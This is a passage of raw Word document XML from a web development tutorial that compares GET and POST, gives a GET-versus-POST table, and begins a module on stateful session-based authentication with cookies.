        <w:t xml:space="preserve">GET requests have NO request body</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GET is idempotent — calling it once or 1,000 times produces exactly the same result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Browsers cache GET responses — visiting the same URL twice may serve the cached response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GET requests appear in browser history and can be bookmarked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GET is safe — it should never cause side effects on the server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CORRECT: GET for read operations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GET /api/accounts/123/balance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GET /api/products?category=electronics&amp;page=2</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GET /api/users/456/orders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WRONG: GET for actions that change state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GET /api/transfer?from=123&amp;to=456&amp;amount=500  // Never do this!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GET /api/users/456/delete                      // Never do this!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thick" w:color="1E40AF" w:sz="16"/>
              <w:bottom w:val="single" w:color="1E40AF" w:sz="6"/>
              <w:right w:val="single" w:color="1E40AF" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="DBEAFE" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E40AF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">💡  Analogy — Idempotent</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The Librarian Analogy: GET is like asking the librarian: 'Can I see the catalog?' You're asking for information. You're not adding or removing anything. The catalog is the same before and after your request. You could ask this question 100 times in a row and the catalog would be unchanged. This is what idempotent means.</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The POST Method</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">POST is the method for submission. It is used when you are sending data to the server that will cause a change in server state — creating a record, initiating a transaction, logging in, uploading a file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key characteristics of POST:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Data is carried in the request BODY — never in the URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">POST is NOT idempotent — submitting the same form twice creates the data twice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Browsers do NOT cache POST responses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">POST requests are NOT in browser history (the body data is not stored)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If you press refresh on a POST page, the browser warns: 'Are you sure you want to resubmit this form?'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CORRECT: POST for operations that change state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POST /api/transfer</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Body: { "from": "ACC-001", "to": "ACC-002", "amount": 500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POST /login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Body: { "username": "john", "password": "secret"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POST /api/users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Body: { "name": "Jane", "email": "jane@example.com" }</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thick" w:color="991B1B" w:sz="16"/>
              <w:bottom w:val="single" w:color="991B1B" w:sz="6"/>
              <w:right w:val="single" w:color="991B1B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="FEE2E2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="991B1B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🚨  Critical Security Rule</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL SECURITY RULE — Never put sensitive data in a GET URL! If a user logs in with GET /login?username=john&amp;password=secret123, the password is permanently stored in browser history, server access logs, and potentially proxy logs. Always use POST for forms containing passwords, credit card numbers, or any sensitive data.</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GET vs POST — Complete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3200"/>
        <w:gridCol w:w="3200"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Property</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Purpose</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Retrieve data</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Submit / create / change data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Data location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URL query string</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Request body</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Idempotent?</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Yes — safe to repeat</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No — repeating causes duplicates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Cacheable?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Yes</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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Bookmarkable?</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Yes</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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Browser history?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Saved in history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Not saved</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Body?</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No body</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Has a body</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Max data size?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Limited (~2000 chars)</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Unlimited (configurable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Safe for sensitive data?</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Never — visible in URL</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Yes — body is not logged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D9488" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Module 2: Stateful vs Stateless Applications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP is a stateless protocol — every request is completely independent. The server has no built-in memory of previous requests. A user who logs in on request #1 appears as a complete stranger on request #2. Yet real applications clearly do remember users. How? Through the architectures described in this module.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 The Fundamental Problem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Imagine a bank teller who has no memory. Every single time a customer approaches the window — even if they just stepped away for one second — the teller has completely forgotten who they are, what account they have, and what they were just discussing. The customer would have to re-identify themselves for every single interaction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">That is exactly how HTTP works by default. This is called statelessness. It was a deliberate design decision that makes HTTP simple, scalable, and cache-friendly. But it creates a massive challenge for web applications: how do we remember users?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The two primary architectural approaches are:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Stateful Architecture — The server maintains state (memory) about each user between requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Stateless Architecture — Each request contains all the information needed to process it; the server maintains no memory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Stateful Architecture (Session-Based)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In a stateful architecture, when a user logs in, the server creates a session object in memory that stores information about that user. This session is given a unique ID. The browser stores this ID in a cookie and sends it with every subsequent request. The server uses this ID to look up the session and identify the user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D9488"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">How Session-Based Authentication Works Step by Step</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">User submits login form via POST /login with username and password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Server validates the credentials against the database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Server creates a session object in memory: { userId: 42, role: 'CUSTOMER', loginTime: '10:00' }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Server assigns a unique ID to this session: JSESSIONID=a7f3b2c9d1e4f5a6b7c8d9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Server sends a Set-Cookie header back to the browser: Set-Cookie: JSESSIONID=a7f3b2c9d1e4f5a6b7c8d9; HttpOnly; Secure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Browser stores the cookie. Every subsequent request automatically includes Cookie: JSESSIONID=a7f3b2c9d1e4f5a6b7c8d9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Server receives the cookie, looks up the session, and knows exactly who the user is.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When the user logs out or the session expires, the session object is deleted from memory.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thick" w:color="1E40AF" w:sz="16"/>
              <w:bottom w:val="single" w:color="1E40AF" w:sz="6"/>
              <w:right w:val="single" w:color="1E40AF" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="DBEAFE" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E40AF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">💡  Analogy</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The Hotel Analogy: When you check in at a hotel, the front desk creates a file for you — Room 305, Mr. John Smith, checking out Friday, preferences: non-smoking, extra towels. They give you a key card (the session ID). Every time you swipe your key card, the hotel's system reads your room number and retrieves your file. When you check out, the file is destroyed.</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Advantages of Stateful Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Simple to implement — Java's HttpSession API is straightforward and intuitive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
